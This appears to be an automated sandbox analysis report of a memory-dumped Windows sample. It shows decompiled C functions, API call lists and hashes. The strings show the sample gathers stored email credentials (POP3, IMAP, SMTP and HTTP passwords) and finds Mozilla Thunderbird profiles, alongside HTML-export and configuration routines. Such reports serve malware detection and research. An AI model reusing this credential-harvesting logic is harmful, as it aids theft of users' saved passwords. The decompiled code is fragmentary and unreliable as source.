                                                                                              • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                              • API String ID: 2416467034-4086712241
                                                                                              • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                              • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                                                              • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                              • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 81%
                                                                                              			E0040F435(CHAR* __eax) {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				void _v267;
                                                                                              				char _v268;
                                                                                              				void _v531;
                                                                                              				char _v532;
                                                                                              				void _v787;
                                                                                              				char _v788;
                                                                                              				void _v1051;
                                                                                              				char _v1052;
                                                                                              				void _v2075;
                                                                                              				char _v2076;
                                                                                              				void* __esi;
                                                                                              				void* _t45;
                                                                                              				void* _t59;
                                                                                              				char* _t60;
                                                                                              				char* _t71;
                                                                                              				char* _t75;
                                                                                              				void* _t84;
                                                                                              				CHAR* _t89;
                                                                                              				void* _t90;
                                                                                              				void* _t91;
                                                                                              				void* _t92;
                                                                                              				void* _t93;
                                                                                              
                                                                                              				_t89 = __eax;
                                                                                              				_v1052 = 0;
                                                                                              				memset( &_v1051, 0, 0x104);
                                                                                              				_v788 = 0;
                                                                                              				memset( &_v787, 0, 0xff);
                                                                                              				 *_t89 = 0;
                                                                                              				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
                                                                                              				_t91 = _t90 + 0x24;
                                                                                              				if(_t45 != 0) {
                                                                                              					L12:
                                                                                              					strcpy(_t89,  &_v1052);
                                                                                              					if( *_t89 == 0) {
                                                                                              						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
                                                                                              						if(E0040F3BA(_t89) == 0) {
                                                                                              							 *_t89 = 0;
                                                                                              						}
                                                                                              						if( *_t89 == 0) {
                                                                                              							E00406172(_t89);
                                                                                              							if(E0040F3BA(_t89) == 0) {
                                                                                              								 *_t89 = 0;
                                                                                              							}
                                                                                              							if( *_t89 == 0) {
                                                                                              								GetCurrentDirectoryA(0x104, _t89);
                                                                                              								if(E0040F3BA(_t89) == 0) {
                                                                                              									 *_t89 = 0;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					return 0 |  *_t89 != 0x00000000;
                                                                                              				} else {
                                                                                              					_v268 = 0;
                                                                                              					memset( &_v267, 0, 0xff);
                                                                                              					_v12 = 0;
                                                                                              					_t59 = E0040EC05(_v8, 0,  &_v268);
                                                                                              					_t92 = _t91 + 0x18;
                                                                                              					while(_t59 == 0) {
                                                                                              						_push(7);
                                                                                              						_t60 =  &_v268;
                                                                                              						_push("mozilla");
                                                                                              						_push(_t60);
                                                                                              						L00411642();
                                                                                              						_t93 = _t92 + 0xc;
                                                                                              						if(_t60 == 0) {
                                                                                              							_v532 = 0;
                                                                                              							memset( &_v531, 0, 0x104);
                                                                                              							_v2076 = 0;
                                                                                              							memset( &_v2075, 0, 0x3ff);
                                                                                              							_push( &_v268);
                                                                                              							_push("%s\\bin");
                                                                                              							_push(0x3ff);
                                                                                              							_push( &_v2076);
                                                                                              							L00411648();
                                                                                              							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
                                                                                              							_t71 =  &_v532;
                                                                                              							_push(0x5c);
                                                                                              							_push(_t71);
                                                                                              							L0041164E();
                                                                                              							_t93 = _t93 + 0x44;
                                                                                              							if(_t71 != 0) {
                                                                                              								 *_t71 = 0;
                                                                                              							}
                                                                                              							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
                                                                                              								_push( &_v788);
                                                                                              								_t75 =  &_v268;
                                                                                              								L004115C4();
                                                                                              								_t84 = _t75;
                                                                                              								if(_t75 > 0) {
                                                                                              									strcpy( &_v1052,  &_v532);
                                                                                              									strcpy( &_v788,  &_v268);
                                                                                              									_t93 = _t93 + 0x10;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_v12 = _v12 + 1;
                                                                                              						_t59 = E0040EC05(_v8, _v12,  &_v268);
                                                                                              						_t92 = _t93 + 0xc;
                                                                                              					}
                                                                                              					RegCloseKey(_v8);
                                                                                              					goto L12;
                                                                                              				}
                                                                                              			}



























                                                                                              0x0040f55a
                                                                                              0x0040f55f
                                                                                              0x0040f561
                                                                                              0x0040f561
                                                                                              0x0040f569
                                                                                              0x0040f581
                                                                                              0x0040f582
                                                                                              0x0040f589
                                                                                              0x0040f591
                                                                                              0x0040f592
                                                                                              0x0040f5a2
                                                                                              0x0040f5b5
                                                                                              0x0040f5ba
                                                                                              0x0040f5ba
                                                                                              0x0040f592
                                                                                              0x0040f569
                                                                                              0x0040f5bd
                                                                                              0x0040f5cd
                                                                                              0x0040f5d2
                                                                                              0x0040f5d2
                                                                                              0x0040f5e0
                                                                                              0x00000000
                                                                                              0x0040f5e0

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F459
                                                                                              • memset.MSVCRT ref: 0040F471
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 0040F4A9
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                                              • memset.MSVCRT ref: 0040F4F6
                                                                                              • memset.MSVCRT ref: 0040F50E
                                                                                              • _snprintf.MSVCRT ref: 0040F52B
                                                                                              • _mbsrchr.MSVCRT ref: 0040F555
                                                                                              • _mbsicmp.MSVCRT ref: 0040F589
                                                                                              • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                                              • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                                              • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                              • API String ID: 3269028891-3267283505
                                                                                              • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                              • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                                                              • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                              • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E0040F126(void* __edi, char* _a4, char* _a8) {
                                                                                              				int _v8;
                                                                                              				void _v263;
                                                                                              				char _v264;
                                                                                              				void _v519;
                                                                                              				char _v520;
                                                                                              				intOrPtr _t32;
                                                                                              				void* _t58;
                                                                                              				char* _t60;
                                                                                              				void* _t61;
                                                                                              				void* _t62;
                                                                                              
                                                                                              				_t58 = __edi;
                                                                                              				_v264 = 0;
                                                                                              				memset( &_v263, 0, 0xfe);
                                                                                              				_v520 = 0;
                                                                                              				memset( &_v519, 0, 0xfe);
                                                                                              				_t62 = _t61 + 0x18;
                                                                                              				_v8 = 1;
                                                                                              				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
                                                                                              					_v8 = 0;
                                                                                              				}
                                                                                              				_t60 = _a4;
                                                                                              				 *_t60 = 0;
                                                                                              				if(_v8 != 0) {
                                                                                              					strcpy(_t60, "<font");
                                                                                              					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                              					if(_t32 > 0) {
                                                                                              						sprintf( &_v264, " size=\"%d\"", _t32);
                                                                                              						strcat(_t60,  &_v264);
                                                                                              						_t62 = _t62 + 0x14;
                                                                                              					}
                                                                                              					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                              					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                              						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
                                                                                              						strcat(_t60,  &_v264);
                                                                                              					}
                                                                                              					strcat(_t60, ">");
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                              					strcat(_t60, "<b>");
                                                                                              				}
                                                                                              				strcat(_t60, _a8);
                                                                                              				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                              					strcat(_t60, "</b>");
                                                                                              				}
                                                                                              				if(_v8 != 0) {
                                                                                              					strcat(_t60, "</font>");
                                                                                              				}
                                                                                              				return _t60;
                                                                                              			}














                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F147
                                                                                              • memset.MSVCRT ref: 0040F15B
                                                                                              • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                                              • sprintf.MSVCRT ref: 0040F1A3
                                                                                              • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                                              • sprintf.MSVCRT ref: 0040F1DA
                                                                                              • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                                              • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                                              • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                                              • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                                              • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                                              • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcat$memsetsprintf$strcpy
                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                              • API String ID: 1662040868-1996832678
                                                                                              • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                              • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                                              • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                              • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040AF17(void* __eax, intOrPtr _a4) {
                                                                                              				char _v271;
                                                                                              				char _v532;
                                                                                              				intOrPtr _v536;
                                                                                              				char _v540;
                                                                                              				void _v803;
                                                                                              				char _v804;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				char* _t47;
                                                                                              				intOrPtr _t67;
                                                                                              				WINDOWPLACEMENT* _t73;
                                                                                              				void* _t75;
                                                                                              				char* _t83;
                                                                                              				struct HWND__* _t84;
                                                                                              				intOrPtr _t88;
                                                                                              				int _t90;
                                                                                              
                                                                                              				_t75 = __eax;
                                                                                              				_v804 = 0;
                                                                                              				memset( &_v803, 0, 0x104);
                                                                                              				GetModuleFileNameA(0,  &_v804, 0x104);
                                                                                              				_t47 = strrchr( &_v804, 0x2e);
                                                                                              				if(_t47 != 0) {
                                                                                              					 *_t47 = 0;
                                                                                              				}
                                                                                              				strcat( &_v804, ".cfg");
                                                                                              				_v536 = _a4;
                                                                                              				_v540 = 0x413bdc;
                                                                                              				_v532 = 0;
                                                                                              				_v271 = 0;
                                                                                              				strcpy( &_v532,  &_v804);
                                                                                              				strcpy( &_v271, "General");
                                                                                              				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
                                                                                              				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
                                                                                              				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
                                                                                              				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
                                                                                              				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
                                                                                              				_t67 = _v536;
                                                                                              				_a4 = _t67;
                                                                                              				_t90 = 0x2c;
                                                                                              				if(_t67 != 0) {
                                                                                              					_t84 =  *(_t75 + 0x108);
                                                                                              					if(_t84 != 0) {
                                                                                              						_t73 = _t75 + 0x128;
                                                                                              						_t73->length = _t90;
                                                                                              						GetWindowPlacement(_t84, _t73);
                                                                                              					}
                                                                                              				}
                                                                                              				_t83 =  &_v540;
                                                                                              				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
                                                                                              				if(_a4 == 0) {
                                                                                              					E00401896(_t75);
                                                                                              				}
                                                                                              				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
                                                                                              			}




















                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040AF3C
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                                                              • strrchr.MSVCRT ref: 0040AF5C
                                                                                              • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                                                              • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                                                              • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                                                              • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                              • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				void _v79;
                                                                                              				char _v80;
                                                                                              				void _v131;
                                                                                              				char _v132;
                                                                                              				void _v183;
                                                                                              				char _v184;
                                                                                              				char _v236;
                                                                                              				void _v491;
                                                                                              				char _v492;
                                                                                              				void* __edi;
                                                                                              				void* _t83;
                                                                                              				void* _t100;
                                                                                              				char* _t103;
                                                                                              				intOrPtr* _t120;
                                                                                              				signed int _t121;
                                                                                              				char _t139;
                                                                                              				signed int _t152;
                                                                                              				signed int _t153;
                                                                                              				signed int _t156;
                                                                                              				intOrPtr* _t157;
                                                                                              				void* _t158;
                                                                                              				void* _t160;
                                                                                              
                                                                                              				_t120 = __ebx;
                                                                                              				_v492 = 0;
                                                                                              				memset( &_v491, 0, 0xfe);
                                                                                              				_t121 = 0xc;
                                                                                              				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
                                                                                              				asm("movsb");
                                                                                              				_t156 = 0;
                                                                                              				_v132 = 0;
                                                                                              				memset( &_v131, 0, 0x31);
                                                                                              				_v184 = 0;
                                                                                              				memset( &_v183, 0, 0x31);
                                                                                              				_v80 = 0;
                                                                                              				memset( &_v79, 0, 0x31);
                                                                                              				_t160 = _t158 + 0x3c;
                                                                                              				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
                                                                                              				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
                                                                                              				if(_t83 != 0xffffffff) {
                                                                                              					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
                                                                                              					_t160 = _t160 + 0x14;
                                                                                              				}
                                                                                              				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                              				_v8 = _t156;
                                                                                              				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
                                                                                              					while(1) {
                                                                                              						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
                                                                                              						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
                                                                                              							strcpy( &_v80, " nowrap");
                                                                                              						}
                                                                                              						_v28 = _v28 | 0xffffffff;
                                                                                              						_v24 = _v24 | 0xffffffff;
                                                                                              						_v20 = _v20 | 0xffffffff;
                                                                                              						_v16 = _t156;
                                                                                              						_t157 = _a8;
                                                                                              						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
                                                                                              						E0040F071(_v28,  &_v184);
                                                                                              						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
                                                                                              						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
                                                                                              						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
                                                                                              						_t153 = _t152 * 0x14;
                                                                                              						if(_t100 == 0xffffffff) {
                                                                                              							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
                                                                                              						} else {
                                                                                              							_push( *(_t153 + _v12 + 0x10));
                                                                                              							_push(E0040F071(_t100,  &_v492));
                                                                                              							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
                                                                                              							_t160 = _t160 + 0x10;
                                                                                              						}
                                                                                              						_t103 =  *(_t120 + 0x50);
                                                                                              						_t139 =  *_t103;
                                                                                              						if(_t139 == 0 || _t139 == 0x20) {
                                                                                              							strcat(_t103, "&nbsp;");
                                                                                              						}
                                                                                              						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
                                                                                              						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
                                                                                              						E00405EFD(_a4,  *(_t120 + 0x4c));
                                                                                              						_t160 = _t160 + 0x2c;
                                                                                              						_v8 = _v8 + 1;
                                                                                              						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
                                                                                              							goto L14;
                                                                                              						}
                                                                                              						_t156 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				L14:
                                                                                              				E00405EFD(_a4, "</table><p>");
                                                                                              				return E00405EFD(_a4, 0x412b1c);
                                                                                              			}
































                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004094A2
                                                                                              • memset.MSVCRT ref: 004094C5
                                                                                              • memset.MSVCRT ref: 004094DB
                                                                                              • memset.MSVCRT ref: 004094EB
                                                                                              • sprintf.MSVCRT ref: 0040951F
                                                                                              • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                                              • sprintf.MSVCRT ref: 004095ED
                                                                                              • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                                                • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                                              • strcpy.MSVCRT(?,?), ref: 00409601
                                                                                              • sprintf.MSVCRT ref: 00409650
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E00409EC4(void* __eax) {
                                                                                              				void* _v36;
                                                                                              				long _v40;
                                                                                              				void* _v44;
                                                                                              				void* _v56;
                                                                                              				long _t21;
                                                                                              				void* _t24;
                                                                                              				long _t26;
                                                                                              				long _t34;
                                                                                              				long _t37;
                                                                                              				intOrPtr* _t40;
                                                                                              				void* _t42;
                                                                                              				intOrPtr* _t44;
                                                                                              				void* _t47;
                                                                                              
                                                                                              				_t40 = ImageList_Create;
                                                                                              				_t47 = __eax;
                                                                                              				_t44 = __imp__ImageList_SetImageCount;
                                                                                              				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                                                                              					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                              					 *(_t47 + 0x18c) = _t37;
                                                                                              					 *_t44(_t37, 1);
                                                                                              					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                                                              					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                                                              					 *(_t47 + 0x190) = _t34;
                                                                                              					 *_t44(_t34, 1);
                                                                                              					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                                                              				}
                                                                                              				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                                                              				 *(_t47 + 0x188) = _t21;
                                                                                              				 *_t44(_t21, 2);
                                                                                              				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                              				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                              				_t42 = _t24;
                                                                                              				 *_t44( *(_t47 + 0x188), 0);
                                                                                              				_t26 = GetSysColor(0xf);
                                                                                              				_v40 = _t26;
                                                                                              				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                                                              				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                                                              				DeleteObject(_v56);
                                                                                              				DeleteObject(_t42);
                                                                                              				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                                                              			}

                                                                                              APIs
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                                              • SendMessageA.USER32 ref: 00409F11
                                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                                              • SendMessageA.USER32 ref: 00409F46
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                                              • LoadImageA.USER32 ref: 00409F7B
                                                                                              • LoadImageA.USER32 ref: 00409F97
                                                                                              • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                                              • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                                              • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                                              • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                                              • DeleteObject.GDI32(?), ref: 00409FDB
                                                                                              • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                                              • SendMessageA.USER32 ref: 00409FFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                              • String ID:
                                                                                              • API String ID: 3411798969-0
                                                                                              • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                              • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                                              • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                              • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 70%
                                                                                              			E0040B841(signed int __eax, void* __esi) {
                                                                                              				void* _t5;
                                                                                              				void* _t6;
                                                                                              				void* _t7;
                                                                                              				void* _t8;
                                                                                              				void* _t9;
                                                                                              				void* _t10;
                                                                                              
                                                                                              				_push("/shtml");
                                                                                              				L004115B2();
                                                                                              				if(__eax != 0) {
                                                                                              					_push("/sverhtml");
                                                                                              					L004115B2();
                                                                                              					if(__eax != 0) {
                                                                                              						_push("/sxml");
                                                                                              						L004115B2();
                                                                                              						if(__eax != 0) {
                                                                                              							_push("/stab");
                                                                                              							L004115B2();
                                                                                              							if(__eax != 0) {
                                                                                              								_push("/scomma");
                                                                                              								L004115B2();
                                                                                              								if(__eax != 0) {
                                                                                              									_push("/stabular");
                                                                                              									L004115B2();
                                                                                              									if(__eax != 0) {
                                                                                              										_push("/skeepass");
                                                                                              										L004115C4();
                                                                                              										asm("sbb eax, eax");
                                                                                              										return ( ~__eax & 0xfffffff8) + 8;
                                                                                              									} else {
                                                                                              										_t5 = 3;
                                                                                              										return _t5;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t6 = 7;
                                                                                              									return _t6;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t7 = 2;
                                                                                              								return _t7;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t8 = 6;
                                                                                              							return _t8;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t9 = 5;
                                                                                              						return _t9;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t10 = 4;
                                                                                              					return _t10;
                                                                                              				}
                                                                                              			}

                                                                                              APIs
                                                                                              • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                                              • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp
                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                              • API String ID: 2884411883-1959339147
                                                                                              • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                              • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                                              • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                              • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				void _v515;
                                                                                              				char _v516;
